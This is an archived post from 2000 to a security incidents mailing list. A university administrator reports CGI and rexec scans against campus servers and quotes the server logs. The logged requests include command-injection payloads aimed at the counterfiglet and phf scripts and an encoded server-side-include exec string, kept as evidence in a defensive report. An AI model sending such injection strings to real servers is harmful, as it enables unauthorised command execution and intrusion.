Security Incidents mailing list archives
Scans from udel.edu and tue.nl
From: jose () BIOCSERVER BIOC CWRU EDU (Jose Nazario)
Date: Tue, 21 Mar 2000 11:59:21 -0500
Hi,
[Local hostnames have been munged, outside addresses are real]
I wanted to write a quick note to you guys about two sets of web scans we
have seen on the CWRU campus these past few days. The first is from the
University of Delaware, with some classic cgi-bin attempts:
strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET
/cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo
HTTP/1.0" 404 301
strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST /cgi-bin/test-cgi
HTTP/1.0" 404 210
strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl
HTTP/1.0" 404 206
strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh
HTTP/1.0" 404 204
strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET
/cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E
HTTP/1.0" 404 207
The second set is from the Netherlands, who just got back to me this
morning regarding two comprimised accounts. They also tried some cgi-bin
scans to gain access to the machine, as well as some rexec attempts and
what appears to be a trojan horse access attempt:
webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl
HTTP/1.0" 404 206
webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST
/cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205
Mar 19 04:23:04 server kernel: TCP connection rejected from
131.155.69.100, port 5556
Mar 19 05:48:22 server kernel: TCP connection rejected from
131.155.69.100, port 512
Mar 19 08:28:46 server kernel: TCP connection rejected from
131.155.69.100, port 512
And on another machine:
Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from
svstud.win.tue.nl
Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from
svstud.win.tue.nl
Mar 19 01:49:15 4C:workstation rexecd[14655]: refused connect from
svstud.win.tue.nl
Mar 19 04:28:21 4C:workstation rexecd[14731]: refused connect from
svstud.win.tue.nl
Mar 19 05:36:30 4C:workstation rexecd[14774]: refused connect from
svstud.win.tue.nl
Mar 19 05:39:34 4C:workstation rexecd[14775]: refused connect from
svstud.win.tue.nl
Mar 19 08:20:00 4C:workstation rexecd[14857]: refused connect from
svstud.win.tue.nl
Mar 19 09:23:25 4C:workstation rexecd[14897]: refused connect from
svstud.win.tue.nl
Both were campus wide probes for web access via cgi-bin and rexecd access
(port 512/TCP).
It's likely that other readers have seen these problems as well.
jose nazario jose () biochemistry cwru edu
PGP fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
Current thread:
- Scans from udel.edu and tue.nl Jose Nazario (Mar 21)
- Re: Scans from udel.edu and tue.nl Alexandru Popa (Mar 22)
- Re: Scans from udel.edu and tue.nl Jose Nazario (Mar 22)
- 8 hours of pinging & POP2 Paul Tero (ME IT) (Mar 22)
- Re: Scans from udel.edu and tue.nl Ryan Russell (Mar 23)
- R: Scans from udel.edu and tue.nl Gregor Sfiligoj (Mar 22)
- Linux Security slam () THEGRID NET (Mar 22)
- Re: Scans from udel.edu and tue.nl Matthew S. Hallacy (Mar 22)
- <Possible follow-ups>
- Re: Scans from udel.edu and tue.nl Fernando Cardoso (Mar 23)
- Re: Scans from udel.edu and tue.nl Ed Padin (Mar 24)
- Re: Scans from udel.edu and tue.nl Alexandru Popa (Mar 22)